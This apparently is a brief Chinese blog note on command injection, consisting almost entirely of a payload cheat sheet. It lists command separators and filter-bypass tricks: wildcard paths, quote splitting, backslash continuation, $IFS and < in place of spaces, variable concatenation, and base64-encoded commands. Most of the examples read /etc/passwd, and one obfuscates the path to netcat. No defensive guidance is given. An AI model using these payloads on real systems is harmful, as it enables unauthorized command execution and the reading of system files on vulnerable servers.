前言

命令注入,通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。基本上,每一个命令注入都是危害极大的。

基本形式

命令分隔方法

%0a换行

%0d回车

;
&
|

绕过方法

通配符绕过

/???/c?t/p??swd 代替 /bin/cat /etc/passwd
/???/n? 代替 /bin/nc

字符串拼接绕过

/'b'i''n/'c''at' /e't'c/p''as''sw'd'

续行符绕过

\c\a\t \/\e\t\c\/\p\a\s\s\w\d
可加回车
c\
at /etc/passwd
用<绕过空格
cat</etc/passwd

$IFS$9绕过空格

cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat${IFS}$9/etc/passwd

变量拼接绕过

a=l;b=s;$a$b

base64编码绕过

`echo "Y2F0IC9ldGMvcGFzc3dkCg=="|base64 -d`

标签: none

添加新评论